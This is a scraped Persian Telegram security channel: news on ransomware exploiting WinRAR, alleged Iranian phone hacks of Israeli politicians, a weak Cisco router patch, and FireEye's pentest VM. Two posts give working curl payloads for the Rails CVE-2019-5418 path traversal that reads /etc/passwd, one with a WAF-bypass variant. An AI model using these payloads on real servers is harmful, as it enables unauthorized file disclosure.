باج افزار جدیدی که با آسیب پذیری winrar با شناسه CVE-2018-20250 منتشر میشود!
نام فایل: vk_4221345.rar
#ransomware
#news
#winrar
@sec_nerd
نام فایل: vk_4221345.rar
#ransomware
#news
#winrar
@sec_nerd
یک روزنامه سعودی گزارش داد هکرهای ایرانی موفق شدند گوشی های همراه همسر و پسر نتانیاهو را هک کنند!
البته این خبر از سوی دفتر نتانیاهو تکذیب شده است اما Karine Elharar یکی از اعضای Yesh Atid (حزب مرکزی) در توییتی به نتانیاهو کنایه زده و ضعف او در حفظ حریم خانوادگی خود را مورد تمسخر قرار داده است.
گویا این حمله چند ماه پیش انجام شده و مشخص نیست چه اطلاعاتی از این دو فرد به دست هکرهای ایرانی افتاده است.
https://www.independentarabia.com/node/13286/%D8%A7%D9%84%D8%A3%D8%AE%D8%A8%D8%A7%D8%B1/%D8%A7%D9%84%D8%B4%D8%B1%D9%82-%D8%A7%D9%84%D8%A3%D9%88%D8%B3%D8%B7/%D9%87%D9%84-%D8%AA%D9%86%D8%B5%D8%AA%D8%AA-%D8%A5%D9%8A%D8%B1%D8%A7%D9%86-%D8%B9%D9%84%D9%89-%D9%86%D8%AA%D9%86%D9%8A%D8%A7%D9%87%D9%88-%D8%A8%D9%88%D8%A7%D8%B3%D8%B7%D8%A9-%D9%87%D8%A7%D8%AA%D9%81%D9%8A-%D8%B2%D9%88%D8%AC%D8%AA%D9%87-%D9%88%D8%A7%D8%A8%D9%86%D9%87-%D9%8A%D8%A7%D8%A6%D9%8A%D8%B1%D8%9F
https://www.jpost.com/Arab-Israeli-Conflict/Saudi-report-Iranians-hacked-the-phones-of-Yair-and-Sara-Netanyahu-583909
#iran
#israel
#news
#breach
@sec_nerd
البته این خبر از سوی دفتر نتانیاهو تکذیب شده است اما Karine Elharar یکی از اعضای Yesh Atid (حزب مرکزی) در توییتی به نتانیاهو کنایه زده و ضعف او در حفظ حریم خانوادگی خود را مورد تمسخر قرار داده است.
گویا این حمله چند ماه پیش انجام شده و مشخص نیست چه اطلاعاتی از این دو فرد به دست هکرهای ایرانی افتاده است.
https://www.independentarabia.com/node/13286/%D8%A7%D9%84%D8%A3%D8%AE%D8%A8%D8%A7%D8%B1/%D8%A7%D9%84%D8%B4%D8%B1%D9%82-%D8%A7%D9%84%D8%A3%D9%88%D8%B3%D8%B7/%D9%87%D9%84-%D8%AA%D9%86%D8%B5%D8%AA%D8%AA-%D8%A5%D9%8A%D8%B1%D8%A7%D9%86-%D8%B9%D9%84%D9%89-%D9%86%D8%AA%D9%86%D9%8A%D8%A7%D9%87%D9%88-%D8%A8%D9%88%D8%A7%D8%B3%D8%B7%D8%A9-%D9%87%D8%A7%D8%AA%D9%81%D9%8A-%D8%B2%D9%88%D8%AC%D8%AA%D9%87-%D9%88%D8%A7%D8%A8%D9%86%D9%87-%D9%8A%D8%A7%D8%A6%D9%8A%D8%B1%D8%9F
https://www.jpost.com/Arab-Israeli-Conflict/Saudi-report-Iranians-hacked-the-phones-of-Yair-and-Sara-Netanyahu-583909
#iran
#israel
#news
#breach
@sec_nerd
اندبندنت عربية
هل تنصتت إيران على نتانياهو بواسطة هاتفي زوجته وابنه يائير؟
في اعقاب الكشف عن خرق إيراني لهاتف بيني غانتس رئيس الأركان السابق والمرشح لرئاسة الحكومة في إسرائيل يتضح أيضا من معلومات حصلت عليها "اندبندنت عربية" أن إيران كانت خرقت قبل فترة ليست بالبعيدة هاتفي
حزب آبی و سفید اسراییل از دادستان این رژیم خواست در خصوص نحوه لو رفتن اطلاعات مرتبط با نفوذ ایرانی ها به تلفن همراه رهبر این حزب اسراییلی به نام Benny Gantz تحقیق کند.
به نظر این حزب، انتشار اخبار مرتبط با این موضوع در ایام نزدیک به انتخابات این رژیم از کانال ۱۲ اسراییل بر روی روند انتخابات تاثیر خواهد گذاشت.
گانتز که پیش از این وزیر جنگ اسراییل بود پنج هفته پیش از سوی آژانس امنیت اسراییل مطلع شد که هک شده است. این نفوذ پنج ماه پیش رخ داده و اطلاعات فردی و پیام های کوتاه از گوشی گانتز به سرقت رفته اند.
اطلاعات بیشتر:
https://www.jta.org/quick-reads/leak-of-alleged-iranian-hack-into-benny-gantz-personal-phone-could-affect-election-outcome
#news
#iran
#israel
#breach
@sec_nerd
به نظر این حزب، انتشار اخبار مرتبط با این موضوع در ایام نزدیک به انتخابات این رژیم از کانال ۱۲ اسراییل بر روی روند انتخابات تاثیر خواهد گذاشت.
گانتز که پیش از این وزیر جنگ اسراییل بود پنج هفته پیش از سوی آژانس امنیت اسراییل مطلع شد که هک شده است. این نفوذ پنج ماه پیش رخ داده و اطلاعات فردی و پیام های کوتاه از گوشی گانتز به سرقت رفته اند.
اطلاعات بیشتر:
https://www.jta.org/quick-reads/leak-of-alleged-iranian-hack-into-benny-gantz-personal-phone-could-affect-election-outcome
#news
#iran
#israel
#breach
@sec_nerd
Jewish Telegraphic Agency
Leak of alleged Iranian hack into Benny Gantz's personal phone could affect election outcome - Jewish Telegraphic Agency
The Blue and White party has asked Israel's attorney general to investigate the link, claiming that it could only have come from the Prime Minister's Office.
یک شبکه تلویزیونی اسراییلی گزارش داد اطلاعات کامپیوتر شخصی و تلفن ایهود باراک، نخست وزیر سابق اسراییل توسط هکرها به سرقت رفت و به ایران فروخته شد.
مسئول آژانس امنیت اسراییل شش ماه پیش این موضوع را به باراک اطلاع داده بود.
https://www.cjnews.com/news/israel/ehud-baraks-cell-phone-and-personal-computer-hacked-information-sold-to-iran
#news
#iran
#israel
#breach
@sec_nerd
مسئول آژانس امنیت اسراییل شش ماه پیش این موضوع را به باراک اطلاع داده بود.
https://www.cjnews.com/news/israel/ehud-baraks-cell-phone-and-personal-computer-hacked-information-sold-to-iran
#news
#iran
#israel
#breach
@sec_nerd
The Canadian Jewish News
Ehud Barak’s cell phone and personal computer hacked; information sold to Iran
The cell phone and personal computer of former Israeli prime minister Ehud Barak were hacked and the information sold to Iran, an Israeli television news channel reported.
Ruby on Rails CVE-2019-5418 tweet-PoC
curl -sL https://goo.gl/NFR6fJ > /tmp/NFR6fJ; docker build -f /tmp/NFR6fJ -t 2019-5418 .; docker run -d --name 2019-5418 -p3000:3000 2019-5418; sleep 4; curl -H 'Accept: ../../../../../../../../etc/passwd{{' 'https://localhost:3000/robots';
#ruby
#pentest
#exploit
@sec_nerd
curl -sL https://goo.gl/NFR6fJ > /tmp/NFR6fJ; docker build -f /tmp/NFR6fJ -t 2019-5418 .; docker run -d --name 2019-5418 -p3000:3000 2019-5418; sleep 4; curl -H 'Accept: ../../../../../../../../etc/passwd{{' 'https://localhost:3000/robots';
#ruby
#pentest
#exploit
@sec_nerd
یَا مُقَلِّبَ الْقُلُوبِ وَ الْأَبْصَارِ
یَا مُدَبِّرَ اللَّیْلِ وَ النَّهَار
یَا مُحَوِّلَ الْحَوْلِ وَ الْأَحْوَالِ
حَوِّلْ حَالَنَا
إِلَی أَحْسَنِ الْحَال
سال ۹۸ بر تمامی همراهان مبارکباد
@sec_nerd
یَا مُدَبِّرَ اللَّیْلِ وَ النَّهَار
یَا مُحَوِّلَ الْحَوْلِ وَ الْأَحْوَالِ
حَوِّلْ حَالَنَا
إِلَی أَحْسَنِ الْحَال
سال ۹۸ بر تمامی همراهان مبارکباد
@sec_nerd
Forwarded from Pavel Durov
How did you like the privacy-focused update of Telegram?
Anonymous Poll
56%
Awesome, keep it up! 👍
44%
Awful, take it back 👎
Forwarded from وب آموز (m J)
⭕️ این نظرسنجی رو پاول دورف در رابطه با قابلیت حذف پیام طرفین در چت خصوصی منتشر کرده ، توجه کنید که تلگرام بستر بسیار مناسبی برای کلاهبرداری است و اگر کلاهبردارها و دزدها بتوانند پیام شما رو هم پاک کنن! (که در بروزرسانی اخیر میتونن!) دیگه هیچ شواهدی برای ارائه به مراجع قضایی ندارید. لذا این قابلیت بسیار عجیب و مخرب ه، اگر موافق هستید، گزینه Awful, take it back رو بزنید و این نظرسنجی رو بازنشر کنید.
🆔 @Webamoozir
🆔 @Webamoozir
حتما در طی روزهای اخیر در مورد آسیب پذیری اجرای دستور از راه دور در روترهای سیسکو سری های RV320 و RV325 خبرهایی خوانده اید که جزییات آن در لینک زیر قابل مشاهده است:
https://www.redteam-pentesting.de/en/advisories/rt-sa-2019-005/-cisco-rv320-command-injection
اما وصله ی منتشر شده توسط سیسکو که مورد اعتراض کارشناسان نیز قرار گرفته است فقط درخواست مهاجم را بررسی میکند و اگر این درخواست با دستور curl اجرا شده باشد (اگر هدر درخواست ارسال شده مطابق با useragent مورد استفاده توسط دستور curl باشد) آن را متوقف میکند که این فیلتر به راحتی قابل دور زدن میباشد!
#news
#cisco
#exploit
#rce
@sec_nerd
https://www.redteam-pentesting.de/en/advisories/rt-sa-2019-005/-cisco-rv320-command-injection
اما وصله ی منتشر شده توسط سیسکو که مورد اعتراض کارشناسان نیز قرار گرفته است فقط درخواست مهاجم را بررسی میکند و اگر این درخواست با دستور curl اجرا شده باشد (اگر هدر درخواست ارسال شده مطابق با useragent مورد استفاده توسط دستور curl باشد) آن را متوقف میکند که این فیلتر به راحتی قابل دور زدن میباشد!
#news
#cisco
#exploit
#rce
@sec_nerd
امنیت اطلاعات
CVE-2019-5418 - File Content Disclosure on Rails https://github.com/mpgn/CVE-2019-5418 #web #pentest #rails #ruby @sec_nerd
دور زدن WAF در این آسیب پذیری
curl -H 'Accept: ../../../../../../e*c/p*s*d{{' https://server/...
@sec_nerd
curl -H 'Accept: ../../../../../../e*c/p*s*d{{' https://server/...
@sec_nerd
شرکت اسراییلی FireEye یک شرکت امنیت سایبری است که قسمتی از فعالیت های این شرکت مربوط به شناسایی گروه های هکری و گزارش فعالیت های آنان است. از جمله این گزارشات میتوان به گزارشات این گروه در خصوص هکرهای ایرانی اشاره کرد که در برخی موارد منجر به اعلام جرم علیه افراد شناخته شده در این حملات گردیده است.
این شرکت اخیرا بسته ابزارهای تست نفوذی را بصورت رایگان در اختیار هکرها قرار داده است که بسته ی مذکور توسط اسکریپت پاورشل بر روی ویندوز ۷ (نصب شده بر روی ماشین مجازی) نصب میشود.
لیست ابزارها و نحوه نصب آنها را در لینک زیر مشاهده کنید:
https://github.com/fireeye/commando-vm
#fireeye
#israel
#pentest
#windows
@sec_nerd
این شرکت اخیرا بسته ابزارهای تست نفوذی را بصورت رایگان در اختیار هکرها قرار داده است که بسته ی مذکور توسط اسکریپت پاورشل بر روی ویندوز ۷ (نصب شده بر روی ماشین مجازی) نصب میشود.
لیست ابزارها و نحوه نصب آنها را در لینک زیر مشاهده کنید:
https://github.com/fireeye/commando-vm
#fireeye
#israel
#pentest
#windows
@sec_nerd
رسانه خبری جعبه سیاه، چند هزار صفحه سند، تصویر و فایل ویدیویی بسیار مهم با طبقه بندی #بکلی_سری از برنامه نظامی هسته ای ایران که با هدف ساخت #سلاح_هسته_ای و تحت نام طرح #آماد میباشد در اختیار دارد.
جملات بالا از کانالی به نام جعبه سیاه برداشته شده که اخیرا تلاش زیادی میکنه که خودی نشون بده و طبق اسنادی که وجود داره ادمین این کانال فردی به نام مسعود مولوی هست که میتونید جزییات بیشتری در مورد این شخص رو با جستجوی نامش در کانال وب آموز بدست بیارید.
جدای از اینکه این آدم چه عقبه و چه توهماتی در سر داره (صوتهای این فرد رو در ادامه میفرستم) و ما قصد نداریم بهش بپردازیم، بیشتر این ادبیات نگارشی و سواد رسانه ای مدنظر ما هست، چرا که بعضی افراد با خوندن پستهای این کانال ممکنه فکر کنن که این فرد یا گروه به منابع اطلاعاتی فوق العاده ای دسترسی دارن و همه جا رو هک کرده و اطلاعات کل مملکت رو در دست دارن (چندهزار صفحه سند!)
این فرد که پیش از این هم با دزدی و کپی کاری، اختراعاتی رو به اسم خودش ثبت کرده،این بار هم اسناد پابلیک و عمومی رو تحت عناوین افشاگری و محرمانه و فوق سری به خورد مخاطبین کانالش میده!
فقط لینک اصلی افشاگری!! های اخیرش رو میگذارم که مربوط به سایت پارچین هست:
https://www.fdd.org/analysis/reports/2019/01/11/a-key-missing-piece-of-the-amad-puzzle/
این اسناد چهار ماه پیش عمومی شدن!
#سواد_رسانه_ای
#جعبه_سیاه
#هوچی_سایبری
@sec_nerd
جملات بالا از کانالی به نام جعبه سیاه برداشته شده که اخیرا تلاش زیادی میکنه که خودی نشون بده و طبق اسنادی که وجود داره ادمین این کانال فردی به نام مسعود مولوی هست که میتونید جزییات بیشتری در مورد این شخص رو با جستجوی نامش در کانال وب آموز بدست بیارید.
جدای از اینکه این آدم چه عقبه و چه توهماتی در سر داره (صوتهای این فرد رو در ادامه میفرستم) و ما قصد نداریم بهش بپردازیم، بیشتر این ادبیات نگارشی و سواد رسانه ای مدنظر ما هست، چرا که بعضی افراد با خوندن پستهای این کانال ممکنه فکر کنن که این فرد یا گروه به منابع اطلاعاتی فوق العاده ای دسترسی دارن و همه جا رو هک کرده و اطلاعات کل مملکت رو در دست دارن (چندهزار صفحه سند!)
این فرد که پیش از این هم با دزدی و کپی کاری، اختراعاتی رو به اسم خودش ثبت کرده،این بار هم اسناد پابلیک و عمومی رو تحت عناوین افشاگری و محرمانه و فوق سری به خورد مخاطبین کانالش میده!
فقط لینک اصلی افشاگری!! های اخیرش رو میگذارم که مربوط به سایت پارچین هست:
https://www.fdd.org/analysis/reports/2019/01/11/a-key-missing-piece-of-the-amad-puzzle/
این اسناد چهار ماه پیش عمومی شدن!
#سواد_رسانه_ای
#جعبه_سیاه
#هوچی_سایبری
@sec_nerd
FDD
A Key Missing Piece of the Amad Puzzle
Download report